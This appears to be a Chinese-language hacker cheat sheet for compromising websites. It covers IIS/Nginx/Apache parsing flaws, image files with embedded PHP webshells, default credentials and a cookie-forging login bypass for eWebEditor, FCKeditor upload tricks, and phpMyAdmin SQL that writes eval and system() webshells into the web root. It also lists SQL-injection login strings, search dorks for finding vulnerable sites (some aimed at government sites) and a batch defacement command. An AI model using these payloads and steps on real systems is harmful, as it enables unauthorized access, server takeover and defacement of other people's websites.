QQ:2373664058
关注网络安全 热爱网络技术
【 解析漏洞总结 】
IIS 6.0
目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码
IIS6.0 会将 xx.jpg 解析为 asp 文件。
后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
默认解析:/xx.asa /xx.cer /xx.cdx
IIS6.0 默认的可执行文件除了 asp 还包含这三种
此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
IIS 7.0/IIS 7.5/Nginx <8.03
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。
常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件
yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。
.然后就在图片目录下生成一句话木马 shell.php 密码 cmd
=============================================================================================================================================================
【 ewebeditor编辑器 】
默认后台:ewebeditor/admin_login.asp
帐号密码:admin admin
样式设计:ewebeditor/admin_style.asp
查看版本:ewebeditor/dialog/about.html
数据库路径:db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名)
遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..
跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=.. (dir为列目录, ..为返回上层目录),形式:dir ../..
点上传文件管理-随便选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)
( ewebeditor5.5版本 )
默认后台:ewebeditor/admin/login.asp
帐号密码:admin 198625
数据库路径:data/%23sze7xiaohu.mdb
遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../
调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup
( ewebeditor3.8 php版本 )
默认后台:eWebEditor/admin/login.php
首先随便输入一个帐号和密码,接着系统会提示出错,这时清空浏览器的url,然后输入以下代码后连按三次回车键:
javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));
接着访问文件:ewebeditor/admin/default.php 就可以直接进入后台了。
( ewebeditor编辑器exp手册 )
有时候什么后缀都上传了,还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试
一:文件上传成功了,但是访问不成功,说明该目录(比如:/UploadFile)被设置了权限,返回去换成/ 上传到根目录就行了.增加asp等不行的时候,可以利用解析asp;jpg
二:下载数据库查看前人留下的痕迹,再访问上传页面拿shell。
页面路径:/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在语句里访问,上传相对应的格式木马。
=============================================================================================================================================================
【 fckeditor编辑器 】
查看版本:fckeditor/editor/dialog/fck_about.html
编辑器页面:FCKeditor/_samples/default.html
上传页面:fckeditor/editor/filemanager/connectors/test.html
遍历目录:FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
编辑页面:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
查看文件上传路径:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=
( 拿shell方法总结 )
ASPX的站几乎都用fck编辑器,建议用工具扫一下,记住inc目录下可能存在fck编辑器,扫下这个目录。
一:如果是iis6.0,上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录,再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell
二:第一次上传1.asp;1.jpg,被重命名为:1_asp;1.jpg,但是第二次上传1.asp;1.jpg,就有可能变成:1.asp;1(1).jpg
三:iis7.5+fck的解析文件为:a.aspx.a;.a.aspx.jpg..jpg.aspx
四:如果不是iis6.0 上传1.asp;jpg然后抓包,接下来改包,将分号变成空格,再用c32把20改成00,保存,利用%00 截断分号两次
五:成功访问别人的一句话木马页面,https://glavesoft.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg 但不知道密码
https://glavesoft.com/UploadFiles\EditorFile\file\2_asp;2.jpg 这个是图片木马,没有成功利用iis6.0解析漏洞还是图片,下载下来用记事本打开找到密码。
六:IIS7.0/7.5 通杀oday,把php一句话木马后缀改成1.jpg传上去,找出一句话的路径后,在1.jpg的后面添加/.php 例如:https://www.xxx.com/iges/php.jpg/.php
( 建立文件夹 . 变 _ 的突破方法 )
利用Fiddler web debugger 这款工具来进行修改数据包,从而达到突破的目的。
注意:安装Fiddler web debugger,需要安装.net环境以及.net的SP2补丁方可运行!
1.打开fck的上传页面,例如:fckeditor/editor/filemanager/browser/default/connectors/test.html
2.再打开Fiddler web debugger这款工具,点击设置--自动断点--选择 “请求之前”
3.接着打开fck的上传页面,创建文件夹,并输入你想要创建的文件名,例如:x.asp
4.然后返回到Fiddler web debugger这款工具里,选择链接--点击右侧的嗅探
5.修改currentfolder内的参数,改成你要建立的文件夹名字,如:x.asp
6.然后点击右侧的:run to completion
7.再点击软件设置--自动断点--禁用,再到浏览器里点击确定建立文件夹,你就会发现文件夹建立为x.asp了
=============================================================================================================================================================
【 linux 】
解析格式:1.php.xxx (xxx可以是任意)
如果apache不认识后缀为rar的文件,我们就用1.php.rar格式上传,文件就会被服务器当做PHP脚本解析。
辨别linux系统方法,例如:https://www.xxx.com/xxx/abc.asp?id=125 把b换成大写B访问,如果出错了,就说明是linux系统,反之是windows系统.
=============================================================================================================================================================
【 旁注 】
旁注的技巧就是挑选支持aspx的站来日,这样提权时候希望较大,如何探测服务器上哪些站点支持aspx呢? 利用bing搜索:https://cn.bing.com/ 搜索格式:ip:服务器ip aspx
比如要入侵一个网站,想知道该网站支不支持aspx,就在网站后面随便加上一个xxx.aspx回车,如果显示的不是iis默认的错误页面,而是这种:“/”应用程序中的服务器错误,说明支持aspx马。
=============================================================================================================================================================
【 phpmyadmin 】
查看版本:test.php 或 phpinfo.php
默认账号密码:root root
万能帐号密码:'localhost'@'@" 密码空
拿shell第一种方法:
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/darkmoon.php';
DROP TABLE IF EXISTS `darkmoon`;
拿shell第二种方法:
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES('<?php @eval($_POST[pass]);?>');
select darkmoon from moon into outfile 'd:/wamp/www/darkmoon2.php';
Drop TABLE IF EXISTS moon;
拿shell第三种方法:
select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/darkmoon3.php'
拿shell第四种方法
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/wamp/www/darkmoon4.php'
127.0.0.1/darkmoon4.php?cmd=net user
找到mysql数据库,执行sql语句即可写入一句话,再菜刀连接即可。
phpmyadmin脱裤:在这里面是可以直接拖库的,如同上传php拖库脚本一样,操作差不多的。
修改mysql默认的root用户名方法:
进入phpmyadmin,进入mysql表,执行sql语句
1.update user set user='你的新root用户名' where user='root';
2.flush privileges;
例如:
用root身份登入,进入mysql库,修改user表即可。
1.use mysql;
2.
3.mysql>update user set user='newName' where user='root';
4.
5.mysql> flush privileges;
=============================================================================================================================================================
【 万能密码 】
( php )
帐号:' UNION Select 1,1,1 FROM admin Where ''='
密码:1
( asp )
'xor
'or'='or'
'or''=''or''='
'or '1'='1'or '1'='1
'or 1=1/*
=============================================================================================================================================================
【 批量关键词 】
inurl:asp?id=
inurl:detail.php?
CompHonorBig.asp?id= 牛比
inurl:show.asp? 非常强大!!!!
site:www.yuming.com
inurl:articleshow.asp?articleid=数字 牛B
inurl:szwyadmin/login.asp
inurl:asp?id=1 intitle:政府
杭州 inurl:Article_Class2.asp?
=============================================================================================================================================================
【 批量挂黑页 】
cmd命令执行 dir d:\wwwroot /b >>1.txt
之后命令 for /f "tokens=* delims= " %i in (d:\1.txt) do echo pause>>D:\wwwroot\%i\wwwroot\1.txt